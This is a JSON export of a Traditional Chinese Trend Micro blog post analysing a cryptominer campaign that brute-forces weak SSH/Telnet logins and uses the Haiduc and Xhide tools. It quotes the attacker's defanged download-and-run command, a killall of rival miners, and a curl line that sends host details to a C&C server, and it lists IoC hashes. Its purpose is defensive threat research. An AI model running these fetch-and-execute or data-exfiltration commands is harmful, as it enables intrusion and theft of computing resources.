{"id":63218,"date":"2020-02-17T09:00:00","date_gmt":"2020-02-17T01:00:00","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=63218"},"modified":"2020-02-05T17:54:57","modified_gmt":"2020-02-05T09:54:57","slug":"%e6%8c%96%e7%a4%a6%e7%a8%8b%e5%bc%8f%e4%bd%bf%e7%94%a8-haiduc-%e9%a7%ad%e5%ae%a2%e5%b7%a5%e5%85%b7%e5%92%8c-xhide-%e6%87%89%e7%94%a8%e7%a8%8b%e5%bc%8f%e9%9a%b1%e8%97%8f%e5%b7%a5%e5%85%b7%e6%9a%b4","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=63218","title":{"rendered":"\u6316\u7926\u7a0b\u5f0f\u4f7f\u7528 Haiduc \u99ed\u5ba2\u5de5\u5177\u548c Xhide \u61c9\u7528\u7a0b\u5f0f\u96b1\u85cf\u5de5\u5177,\u66b4\u529b\u767b\u5165\u96fb\u8166\u8207\u4f3a\u670d\u5668"},"content":{"rendered":"\n<p>\u8da8\u52e2\u79d1\u6280\u67b6\u8a2d\u7684\u67d0\u500b\u8a98\u6355\u74b0\u5883\u5728\u4e00\u500b\u906d\u5230\u5165\u4fb5\u7684\u7db2\u7ad9 (hxxps:\/\/upajmeter[.]com\/assets\/.style\/min) \u4e0a\u5075\u6e2c\u5230\u865b\u64ec\u52a0\u5bc6\u8ca8\u5e63\u6316\u7926\u653b\u64ca\u3002\u6b79\u5f92\u5728\u8a72\u7db2\u7ad9\u4e0a\u63d2\u5165\u4e00\u4e9b\u6307\u4ee4\u4f86\u4e0b\u8f09\u5176\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c (shell script)\uff0c\u4e5f\u5c31\u662f\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u5230\u7684 <a rel=\"noreferrer noopener\" href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.sh.malxmr.uwejs\" target=\"_blank\">Trojan.SH.MALXMR.UWEJS<\/a>\u3002\u9019\u500b\u6316\u7926\u7a0b\u5f0f\u7531\u591a\u500b\u5143\u4ef6\u6240\u7d44\u6210\uff0c\u5305\u62ec\u4e0d\u540c\u7684 Perl \u548c Bash \u8173\u672c\u3001\u4e8c\u9032\u4f4d\u6a94\u6848\u3001\u61c9\u7528\u7a0b\u5f0f\u96b1\u85cf\u5de5\u5177 Xhide \u4ee5\u53ca\u4e00\u500b\u6383\u7784\u5de5\u5177\u3002\u6b64\u6316\u7926\u7a0b\u5f0f\u5728\u6563\u5e03\u6642\u6703\u6383\u7784\u96fb\u8166\u662f\u5426\u542b\u6709\u67d0\u4e9b\u6f0f\u6d1e\uff0c\u4e14\u6703\u5229\u7528\u66b4\u529b\u767b\u5165\u65b9\u5f0f (\u4e3b\u8981\u662f\u4f7f\u7528\u9810\u8a2d\u7684\u767b\u5165\u5e33\u865f\u548c\u5bc6\u78bc) \u4f86\u5165\u4fb5\u96fb\u8166\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/documents.trendmicro.com\/images\/TEx\/articles\/cryptocurrency-miner-haiduc-xhide-brute-force-servers.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u6839\u64da\u6211\u5011\u5c0d\u8a72\u5a01\u8105\u7684\u5206\u6790\u986f\u793a\uff0c\u60e1\u610f\u6a94\u6848\u6703\u5728\u4e00\u5929\u7576\u4e2d\u57f7\u884c\u591a\u6b21\uff0c\u5b9a\u671f\u5c07\u53d7\u611f\u67d3\u96fb\u8166\u7684\u6700\u65b0\u72c0\u6cc1\u56de\u5831\u7d66\u5e55\u5f8c\u64cd\u7e31\n(C&amp;C) \u4f3a\u670d\u5668\u3002\u611f\u67d3\u904e\u7a0b\u7576\u4e2d\u4f7f\u7528\u7684\u6307\u4ee4\u5217\u8173\u672c\u4e5f\u6703\u4e0b\u8f09\u4e00\u4e9b\u5305\u542b\u5176\u6383\u7784\u5de5\u5177\u3001\u57f7\u884c\u7a0b\u5e8f\u96b1\u85cf\u5de5\u5177\uff0c\u4ee5\u53ca\u6700\u7d42\u60e1\u610f\u6a94\u6848\u7684\u58d3\u7e2e\u6a94\u3002<\/p>\n\n\n\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u9019\u9805\u5a01\u8105\u9084\u6703\u5229\u7528\u4e00\u500b\u57f7\u884c\u7a0b\u5e8f\u96b1\u85cf\u5de5\u5177\u4f86\u96b1\u85cf\u6316\u7926\u7a0b\u5f0f\u7684\u4e8c\u9032\u4f4d\u6a94\u6848\uff0c\u8b93\u4e00\u822c\u4f7f\u7528\u8005\u66f4\u4e0d\u5bb9\u6613\u6ce8\u610f\u5230\u6b79\u5f92\u7684\u6316\u7926\u6d3b\u52d5\uff0c\u9802\u591a\u53ea\u6703\u767c\u73fe\u96fb\u8166\u6548\u80fd\u8b8a\u6162\uff0c\u4ee5\u53ca\u67d0\u4e9b\u53ef\u7591\u7684\u7db2\u8def\u6d41\u91cf\u3002\u9019\u662f\u6b79\u5f92\u7528\u4f86\u63a9\u84cb\u5176\u6383\u7784\u3001\u66b4\u529b\u767b\u5165\u8207\u6316\u7926\u6d3b\u52d5\u7684\u4e00\u7a2e<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/outlaw-group-distributes-botnet-for-cryptocurrency-mining-scanning-and-brute-force\/\" target=\"_blank\" rel=\"noreferrer noopener\">\u5df2\u77e5<\/a>\u624b\u6cd5\u3002<\/p>\n\n\n\n<!--more-->\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/old-tools-for-new-money-url-spreading-shellbot-and-xmrig-using-17-year-old-xhide\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>\u8001\u5de5\u5177\u7684\u8cfa\u9322\u65b0\u82b1\u62db\uff1a\u60e1\u610f\u7db2\u5740\u4f7f\u7528\u5df2\u6709 17 \u5e74\u6b77\u53f2\u7684 XHide \u4f86\u6563\u64ad Shellbot \u548c XMRig \u60e1\u610f\u7a0b\u5f0f<\/strong><\/a><\/p>\n\n\n\n<p>\u6211\u5011\u767c\u73fe\u8a72\u5a01\u8105\u6703\u6383\u7784\u958b\u653e\u7684\u9023\u63a5\u57e0\uff0c\u7136\u5f8c\u66b4\u529b\u767b\u5165\u5bc6\u78bc\u5f37\u5ea6\u4e0d\u8db3\u7684\u7cfb\u7d71\uff0c\u4e26\u5728\u7cfb\u7d71\u4e0a\u5b89\u88dd\u4e00\u500b\u9580\u7f85\u5e63\n(Monero) \u6316\u7926\u7a0b\u5f0f\uff0c\u6700\u5f8c\u4e0b\u8f09\u4e00\u500b\u4ee5 Perl \u64b0\u5beb\u7684 IRC \u5f8c\u9580\u7a0b\u5f0f\u3002\u99ed\u5ba2\u5229\u7528 XHide Process Faker \u4f86\u96b1\u85cf\u6316\u7926\u7a0b\u5f0f\u7684\u57f7\u884c\u7a0b\u5e8f\uff0c\u9019\u662f\u4e00\u500b\u64c1\u6709\n17 \u5e74\u6b77\u53f2\u7684\u958b\u653e\u539f\u59cb\u78bc\u5de5\u5177\uff0c\u53ef\u7528\u4f86\u8b8a\u9020\u57f7\u884c\u7a0b\u5e8f\u7684\u540d\u7a31\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u611f\u67d3\u904e\u7a0b<\/strong><\/h3>\n\n\n\n<p>\u99ed\u5ba2\u4e00\u958b\u59cb\u6703\u5148\u5229\u7528\u7cfb\u7d71\u5bc6\u78bc\u5f37\u5ea6\u4e0d\u8db3\u6216\u4f7f\u7528\u9810\u8a2d\u5bc6\u78bc\u7684\u5f31\u9ede\u4f86\u66b4\u529b\u767b\u5165\u7cfb\u7d71\u3002\u63a5\u8457\uff0c\u5c31\u6703\u5728\u5df2\u767b\u5165\u7684\u7cfb\u7d71\u4e0a\u57f7\u884c\u4e00\u9053\u6307\u4ee4\uff1a<\/p>\n\n\n\n<p><code>cd \/tmp;wget hxxps:\/\/upajmeter[.]com\/assets\/.style\/min;curl\n-O hxxps:\/\/upajmeter[.]com\/assets\/.style\/min;chmod +x min;perl min;rm -rf min*<\/code><\/p>\n\n\n\n<p>\u9019\u500b\u7b2c\u4e00\u968e\u6bb5\u6a94\u6848\u300cmin\u300d\n(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.perl.malxmr.uwejs\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.Perl.MALXMR.UWEJS<\/a>) \u6703\u4e0b\u8f09\u53e6\u4e00\u500b\u6a94\u6848\u300cmin.sh\u300d(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.sh.malxmr.uwejs\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.SH.MALXMR.UWEJS<\/a>)\uff0c\u4e5f\u5c31\u662f\u6b64\u5a01\u8105\u7684\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c\uff0c\u5b83\u6703\u5b89\u88dd\u6b64\u5a01\u8105\u7684\u5404\u9805\u5143\u4ef6\u3002\u5728\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c\u57f7\u884c\u904e\u5f8c\uff0c\u99ed\u5ba2\u6703\u8a66\u5716\u5c07\u7cfb\u7d71\u4e0a\u539f\u672c\u6b63\u5728\u57f7\u884c\u7684\u5404\u7a2e\u5df2\u77e5\u6316\u7926\u7a0b\u5f0f\u5168\u90e8\u7d42\u6b62\uff1a<\/p>\n\n\n\n<p><code>killall -9 rand rx rd tsm tsm2 haiduc a\nsparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr\npython cron ntpd start start.sh libssl sparky.sh<\/code><\/p>\n\n\n\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u6307\u4ee4\u5217\u8173\u672c\u6703\u518d\u4e0b\u8f09\u4e26\u57f7\u884c\u5169\u500b\u6a94\u6848\u4e0b\u8f09\u5de5\u5177\uff1a\u300ccron.sh\u300d\u548c\u300cnano.sh\u300d\n(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.sh.malxmr.uwejt\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.SH.MALXMR.UWEJT<\/a>)\uff0c\u9019\u5169\u500b\u5de5\u5177\u6bcf\u5929\u90fd\u6703\u5b9a\u671f\u4e0d\u65b7\u57f7\u884c\uff0c\u5206\u5225\u662f\u6bcf\u4e00\u5c0f\u6642\u548c\u6bcf 30 \u5206\u9418\u57f7\u884c\u4e00\u6b21\u3002\u5b83\u5011\u6703\u5728\u7cfb\u7d71\u690d\u5165\u300crcmd.sh\u300d(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.sh.malxmr.uweju\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.SH.MALXMR.UWEJU<\/a>)\uff0c\u8a72\u8173\u672c\u8ca0\u8cac\u5b9a\u671f\u900f\u904e HTTP \u8acb\u6c42\u5411 C&amp;C \u4f3a\u670d\u5668\u56de\u5831\u53d7\u611f\u67d3\u96fb\u8166\u7684\u72c0\u6cc1\uff1a<\/p>\n\n\n\n<p><code>curl -d\n\"info=POST&amp;data=SERVER---&gt; $(whoami)@$SERVERIP <\/code><br>\n<code>DATE---&gt; $(date) <\/code><br>\n<code>SERV---&gt; $(uname -a) ===&gt; $(nproc)\nPROCESORS ===&gt; VIDEO $(lspci | grep VGA) ===&gt;$(ps x|grep bash)\"\nhxxp:\/\/upajmeter[.]com\/assets\/.style\/remote\/info.php &gt; \/dev\/null<\/code><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong><em>\u58d3\u7e2e\u6a94\u6848<\/em><\/strong><\/h4>\n\n\n\n<p>\u6b64\u5916\uff0c\u8a72\u6307\u4ee4\u5217\u8173\u672c\u9084\u6703\u4e0b\u8f09\u6316\u7926\u7a0b\u5f0f\u7684\u58d3\u7e2e\u6a94\u6848\u300cmonero.tgz\u300d(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba\n<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.linux.malxmr.uwejs\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.Linux.MALXMR.UWEJS<\/a>) \u4e26\u89e3\u958b\u58d3\u7e2e\u6a94\u4e2d\u7684\u5167\u5bb9\u4f86\u57f7\u884c\u3002\u58d3\u7e2e\u6a94\u5167\u542b\u6709\u6316\u7926\u7a0b\u5f0f\u7684\u4e8c\u9032\u4f4d\u6a94\u6848\uff0c\u53ef\u900f\u904e\u6a94\u6848\u4e2d\u5305\u542b\u7684\u6307\u4ee4\u5217\u8173\u672c\u53ca\nPerl \u8173\u672c\u4f86\u57f7\u884c\u3002<\/p>\n\n\n\n<p>\u6b64\u58d3\u7e2e\u6a94\u7684\u5167\u5bb9\u4e3b\u8981\u662f\u7d44\u614b\u8a2d\u5b9a\u6a94\u6848\u4ee5\u53ca\u5404\u5143\u4ef6\u57f7\u884c\u6240\u9700\u7684\u6a94\u6848\uff0c\u5982\uff1a\u300cconfig.txt\u300d\u3001\u300ccpu.txt\u300d\u3001\u300ch32\u300d(32\n\u4f4d\u5143 Xhide \u7a0b\u5f0f)\u3001\u300ch64\u300d(64 \u4f4d\u5143 Xhide \u7a0b\u5f0f)\u3001\u300cpools.txt\u300d\u3001\u300crun\u300d\u3001\u300cstartMSR\u300d\u3001\u300cx\u300d\u3001\u300cx.pl\u300d\u3001\u300cxmr-stak\u300d\u4ee5\u53ca\u300cxmrig\u300d\u3002Xhide\n\u7a0b\u5f0f\u53ef\u7528\u4f86\u96b1\u85cf\u6316\u7926\u7a0b\u5f0f\u7684\u57f7\u884c\u7a0b\u5e8f (\u900f\u904e\u300c-bash\u300d\u4f86\u4fee\u6539\u57f7\u884c\u7a0b\u5e8f\u540d\u7a31)\u3002<\/p>\n\n\n\n<p>\u63a5\u4e0b\u4f86\uff0c\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c\u6703\u4e0b\u8f09\u5305\u542b\u6383\u7784\u5de5\u5177\u7684\u58d3\u7e2e\u6a94\u300csslm.tgz\u300d(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba\n<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.linux.sshbrute.uwejs\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.Linux.SSHBRUTE.UWEJS<\/a>) \u4e26\u89e3\u958b\u5176\u4e2d\u7684\u6383\u7784\u5de5\u5177\u4f86\u57f7\u884c\u3002\u58d3\u7e2e\u6a94\u4e2d\u542b\u6709\nTelnet\/SSH \u6383\u7784\u5de5\u5177\u3001\u7528\u4f86\u57f7\u884c\u8a72\u5de5\u5177\u7684\u6307\u4ee4\u5217\u8173\u672c\u8207 Perl \u8173\u672c\uff0c\u4ee5\u53ca\u6383\u7784\u904e\u7a0b\u7576\u4e2d\u6703\u7528\u5230\u7684\u5bc6\u78bc\u6e05\u55ae\u3002<\/p>\n\n\n\n<p><strong><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/perl-based-shellbot-looks-to-target-organizations-via-cc\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>\u7d93\u7531 C&amp;C \u5e55\u5f8c\u64cd\u63a7\uff0c\u4f7f\u7528\u4ee5 Perl \u64b0\u5beb\u7684 Shellbot \u653b\u64ca\u4f01\u696d<\/strong><\/a><\/strong><strong><\/strong><\/p>\n\n\n\n<p>\u6839\u64da\u6211\u5011\u767c\u73fe\uff0c\u4e00\u500b\u540d\u70ba\u300chaiduc\u300d(\u7f85\u99ac\u5c3c\u4e9e\u6587\uff0c\u610f\u70ba\u300c\u4e0d\u6cd5\u4e4b\u5f92\u300d)\n\u7684\u99ed\u5ba2\u96c6\u5718 (\u4ee5\u8a72\u5718\u9ad4\u6240\u4f7f\u7528\u7684\u5de5\u5177\u70ba\u540d) \u5c08\u9580\u4f7f\u7528 Perl Shellbot \u6240\u88fd\u4f5c\u7684 IRC \u6bad\u5c4d\u75c5\u6bd2 (bot) \u4f86\u653b\u64ca\u4f01\u696d\u3002<\/p>\n\n\n\n<p>\u524d\u8ff0\u7684\u6383\u7784\u5de5\u5177\u58d3\u7e2e\u6a94\u5167\u542b\u6709\u4ee5\u4e0b\u6a94\u6848\uff1a\u300c.pass\u300d(\u96a8\u6a5f\u516c\u5171\nIP \u5340\u6bb5\u77ed\u5bc6\u78bc\u6e05\u55ae)\u3001\u300cpass\u300d(\u79c1\u4eba IP \u5340\u6bb5\u9577\u5bc6\u78bc\u6e05\u55ae)\u3001\u300clibssl\u300d(\u4ee5 UPX \u58d3\u7e2e\u7684 Haiduc \u6383\u7784\u5de5\u5177)\u3001\u300csparky.sh\u300d\u3001\u300cstart\u300d\u3001\u300cstart.pl\u300d\u4ee5\u53ca\u300cstart.sh\u300d\u3002<\/p>\n\n\n\n<p>\u8a72\u6383\u7784\u5de5\u5177\u6703\u8a66\u5716\u611f\u67d3\u4e26\u638c\u63a7\u79c1\u4eba\nIP \u5340\u6bb5\u5167\u7684\u88dd\u7f6e (\u6b64\u5916\u4e5f\u6703\u8a66\u5716\u611f\u67d3\u53d7\u5bb3\u96fb\u8166\u6240\u5728\u5340\u57df\u7db2\u8def\u5167\u7684\u6240\u6709\u88dd\u7f6e)\uff0c\u5229\u7528\u4e00\u500b\u542b\u6709 3,637 \u7d44\u4f7f\u7528\u540d\u7a31\u548c\u5bc6\u78bc\u7684\u6e05\u55ae\u4f86\u8a66\u5716\u66b4\u529b\u767b\u5165\u96fb\u8166\u3002\u6b64\u5916\uff0c\u5b83\u9084\u6703\u4f7f\u7528\u53e6\u4e00\u500b\u77ed\u5bc6\u78bc\u6e05\u55ae\u4f86\u8a66\u5716\u611f\u67d3\u516c\u5171\nIP \u5340\u6bb5\u300c{0-216 \u4e4b\u9593\u7684\u96a8\u6a5f\u6578\u5b57}.0.0.0\/8\u300d\u5167\u7684\u88dd\u7f6e\u3002\u6839\u64da\u5176\u4f7f\u7528\u7684\u5e33\u865f\u5bc6\u78bc\u4f86\u770b\uff0c\u6b64\u653b\u64ca\u4e3b\u8981\u91dd\u5c0d\u7684\u662f\u8cc7\u6599\u5eab\u3001\u5132\u5b58\u88dd\u7f6e\u3001\u904a\u6232\u4ee5\u53ca\u6316\u7926\u5c08\u7528\u8a2d\u5099\u76f8\u95dc\u7684\u4f3a\u670d\u5668\u3002<\/p>\n\n\n\n<p>\u653b\u64ca\u4e00\u65e6\u5f97\u901e\uff0c\u99ed\u5ba2\u5c31\u80fd\u5229\u7528\u524d\u8ff0\u7684\u6307\u4ee4\u5728\u7cfb\u7d71\u4e0a\u6316\u7926\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u4fdd\u8b77\u88dd\u7f6e\uff0c\u9632\u7bc4\u865b\u64ec\u52a0\u5bc6\u8ca8\u5e63\u6316\u7926\u5a01\u8105<\/strong><\/h3>\n\n\n\n<p>\u9019\u8d77\u865b\u64ec\u52a0\u5bc6\u8ca8\u5e63\u6316\u7926\u653b\u64ca\u5e55\u5f8c\u7684\u99ed\u5ba2\u96c6\u5718\u7d50\u5408\u4e86\nHaiduc \u548c Xhide \u5169\u500b\u904e\u53bb<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor\/\" target=\"_blank\" rel=\"noreferrer noopener\">\u66fe\u7d93<\/a>\u76f8\u7576\u77e5\u540d\u7684\u5de5\u5177\u4f86\u5f9e\u4e8b\u60e1\u610f\u6d3b\u52d5\u3002\u5229\u7528\u9019\u4e9b\u5de5\u5177\uff0c\u518d\u914d\u5408\u5bc6\u78bc\u6e05\u55ae\u4f86\u66b4\u529b\u767b\u5165\u5bc6\u78bc\u5f37\u5ea6\u4e0d\u8db3\u7684\u7cfb\u7d71\uff0c\u5c31\u80fd\u8eb2\u907f\u50b3\u7d71\u7db2\u8def\u8cc7\u5b89\u89e3\u6c7a\u65b9\u6848\u7684\u5075\u6e2c\u3002\u4e0d\u50c5\u5982\u6b64\uff0c\u50cf\u9019\u6a23\u7684\u60e1\u610f\u7a0b\u5f0f\u9084\u53ef\u80fd\u5f71\u97ff\u7cfb\u7d71\u6548\u80fd\uff0c\u4e26\u8b93\u4f7f\u7528\u8005\u66b4\u9732\u65bc\u66f4\u591a\u5176\u4ed6\u985e\u578b\u7684\u5165\u4fb5\u3002<\/p>\n\n\n\n<p>\u96d6\u7136\u6211\u5011\u5c1a\u672a\u770b\u5230\u8a72\u96c6\u5718\u767c\u52d5\u5927\u898f\u6a21\u7684\u653b\u64ca\uff0c\u4f46\u4f7f\u7528\u8005\u4ecd\u61c9\u63a1\u53d6\u4e00\u4e9b\u9632\u8b77\u63aa\u65bd\u4f86\u9632\u7bc4\u4efb\u4f55\u6f5b\u5728\u7684\u653b\u64ca\uff0c\u5305\u62ec\uff1a<\/p>\n\n\n\n<ul><li><strong>\u5c0f\u5fc3\u9632\u7bc4\u5df2\u77e5\u653b\u64ca\u7ba1\u9053\uff0c\u5982\uff1a\u4e0d\u8acb\u81ea\u4f86\u7684\u96fb\u5b50\u90f5\u4ef6\u3001\u793e\u4ea4\u5de5\u7a0b\u9023\u7d50\u8207\u9644\u4ef6\u6a94\u6848\u3001\u53ef\u7591\u7684\u7db2\u7ad9\u4ee5\u53ca\u53ef\u7591\u7684\u7b2c\u4e09\u65b9\u61c9\u7528\u7a0b\u5f0f\u3002<\/strong><strong><\/strong><\/li><li><strong>\u8b8a\u66f4\u88dd\u7f6e\u9810\u8a2d\u5bc6\u78bc\u4ee5\u9632\u6b62\u88dd\u7f6e\u906d\u4eba\u4e0d\u7576\u5b58\u53d6\u3002<\/strong><\/li><li><strong>\u96a8\u6642\u5957\u7528\u6700\u65b0\u4fee\u88dc\u66f4\u65b0\u3002<\/strong><\/li><li><strong>\u5b9a\u671f\u6aa2\u67e5\u4e26\u78ba\u8a8d\u6240\u6709\u5e33\u865f\u7686\u50c5\u7528\u65bc\u5408\u6cd5\u7528\u9014\u3002<\/strong><strong><\/strong><\/li><\/ul>\n\n\n\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u4f7f\u7528\u8005\u4e5f\u53ef\u8003\u616e\u63a1\u7528\u4e00\u4e9b\u8cc7\u5b89\u89e3\u6c7a\u65b9\u6848\uff0c\u63a1\u7528\u8de8\u4e16\u4ee3\u878d\u5408\u7684\u9632\u79a6\u6280\u5de7\u5354\u52a9\u60a8\u9632\u7bc4\u6bad\u5c4d\u75c5\u6bd2\u76f8\u95dc\u6d3b\u52d5\u3002<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/all-solutions.html\" target=\"_blank\" rel=\"noreferrer noopener\">\u8da8\u52e2\u79d1\u6280 XGen&#x2122; \u9632\u8b77<\/a>\u63d0\u4f9b\u4e86\u9ad8\u6e96\u5ea6\u6a5f\u5668\u5b78\u7fd2\u4f86\u4fdd\u8b77&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps.html\" target=\"_blank\" rel=\"noreferrer noopener\">\u9598\u9053<\/a>&nbsp;\u548c<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps.html\" target=\"_blank\" rel=\"noreferrer noopener\">\u7aef\u9ede<\/a>\uff0c\u6db5\u84cb\u5be6\u9ad4\u3001\u865b\u64ec\u4ee5\u53ca\u96f2\u7aef\u5de5\u4f5c\u8ca0\u8f09\u3002XGen \u9632\u8b77\u5229\u7528\u7db2\u7ad9\/\u7db2\u5740\u904e\u6ffe\u3001\u884c\u70ba\u5206\u6790\u3001\u5ba2\u88fd\u5316\u6c99\u76d2\u6a21\u64ec\u5206\u6790\u7b49\u6280\u8853\u4f86\u9632\u7bc4\u96a8\u6642\u6f14\u8b8a\u4e14\u80fd\u8eb2\u907f\u50b3\u7d71\u8cc7\u5b89\u63a7\u7ba1\u4e26\u653b\u64ca\u5df2\u77e5\u53ca\u672a\u77e5\u6f0f\u6d1e\u7684\u5a01\u8105\u3002\u6b64\u5916\uff0cXGen&#x2122; \u9632\u8b77\u540c\u6642\u4e5f\u662f\u8da8\u52e2\u79d1\u6280 <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-security.html\" target=\"_blank\" rel=\"noreferrer noopener\">Hybrid Cloud Security<\/a> \u6df7\u5408\u96f2\u9632\u8b77\u3001<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection.html\" target=\"_blank\" rel=\"noreferrer noopener\">User Protection<\/a> \u4f7f\u7528\u8005\u9632\u8b77\u4ee5\u53ca <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/network.html\" target=\"_blank\" rel=\"noreferrer noopener\">Network Defense<\/a> \u7db2\u8def\u9632\u79a6\u7b49\u89e3\u6c7a\u65b9\u6848\u7684\u6280\u8853\u57fa\u790e\u3002&nbsp;<\/p>\n\n\n\n<p>\u63a1\u7528 <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/network\/integrated-atp\/next-gen-intrusion-prevention-system.html\" target=\"_blank\" rel=\"noreferrer noopener\">\u8da8\u52e2\u79d1\u6280 Deep Discovery Inspector<\/a> (DDI) \u7684\u7528\u6236\u53ef\u5229\u7528\u4ee5\u4e0b\u898f\u5247\u4f86\u6514\u622a\u6316\u7926\u8207\nC&amp;C \u9023\u7dda\u7684\u76f8\u95dc\u7db2\u8def\u6d41\u91cf\uff0c\u9032\u800c\u9632\u7bc4\u9019\u9805\u5a01\u8105\uff1a<\/p>\n\n\n\n<ul><li><strong>Rule 2573: MINER &#8211; TCP (Request)<\/strong><strong><\/strong><\/li><li><strong>Rule 4313 &#8211; MALXMR &#8211; HTTP (Request)<\/strong><strong><\/strong><\/li><\/ul>\n\n\n\n<p><strong>\u5165\u4fb5\u6307\u6a19\n(IoC)\uff1a<\/strong><\/p>\n\n\n\n<p><em>SHA-256<\/em><\/p>\n\n\n\n<style>\n   table {border-collapse:collapse; table-layout:fixed; width:310px;}\n   table td {border:solid 1px ; width:100px; word-wrap:break-word;}\n   <\/style>\n\n<figure class=\"wp-block-table\"><table  class=\" table table-hover\" ><tbody><tr><td>\n  <strong>\u6a94\u6848\u540d\u7a31<\/strong>\n  <\/td><td>\n  <strong>\u96dc\u6e4a\u78bc<\/strong>\n  <\/td><td>\n  <strong>\u8da8\u52e2\u79d1\u6280\u75c5\u6bd2\u78bc\u5075\u6e2c\u540d\u7a31<\/strong>\n  <\/td><td>\n  <strong>\u5099\u8a3b<\/strong>\n  <\/td><\/tr><tr><td>\n  config.txt\n  <\/td><td>\n  91a80ee885d7586292260750a4129ad305fe252a39002cbde546e8161873a906\n  <\/td><td>\n  Trojan.Win32.MALXMR.BJ\n  <\/td><td>\n  \u8a2d\u5b9a\u6a94\u3002\n  <\/td><\/tr><tr><td>\n  cpu.txt\n  <\/td><td>\n  60a1f3cf6a6a72e45bfb299839f25e872e016b6e1f9d465477224d0c6bb2d53a\n  <\/td><td>\n  Trojan.Win32.MALXMR.BJ\n  <\/td><td>\n  \u8a2d\u5b9a\u6a94\u3002\n  <\/td><\/tr><tr><td>\n  cron.sh\n  <\/td><td>\n  fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.sh.malxmr.uwejt\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.SH.MALXMR.UWEJT<\/a>\n  <\/td><td>\n  \u4e0b\u8f09\u5143\u4ef6\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  h32\n  <\/td><td>\n  45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161\n  <\/td><td>\n  HackTool.Linux.XHide.GA\n  <\/td><td>\n  Xhide \u4e8c\u9032\u4f4d\u6a94\u6848 (32 \u4f4d\u5143)\u3002\n  <\/td><\/tr><tr><td>\n  h64\n  <\/td><td>\n  7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf\n  <\/td><td>\n  HackTool.Linux.XHide.GA\n  <\/td><td>\n  Xhide \u4e8c\u9032\u4f4d\u6a94\u6848 (64 \u4f4d\u5143)\u3002\n  <\/td><\/tr><tr><td>\n  libssl\n  <\/td><td>\n  6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4e114128f4fb6a4\n  <\/td><td>\n  HackTool.Linux.SSHBRUTE.GA\n  <\/td><td>\n  Haiduc \u6383\u7784\u5de5\u5177 (\u63a1\u7528 UPX \u58d3\u7e2e)\u3002\n  <\/td><\/tr><tr><td>\n  min\n  <\/td><td>\n  07f6e31ffab85fe561c6f39aa3cf62c71017b790ee8eb1b028579ef982e861ab\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.perl.malxmr.uwejs\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.Perl.MALXMR.UWEJS<\/a>\n  <\/td><td>\n  \u4e0b\u8f09\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c\u3002\n  <\/td><\/tr><tr><td>\n  min.sh\n  <\/td><td>\n  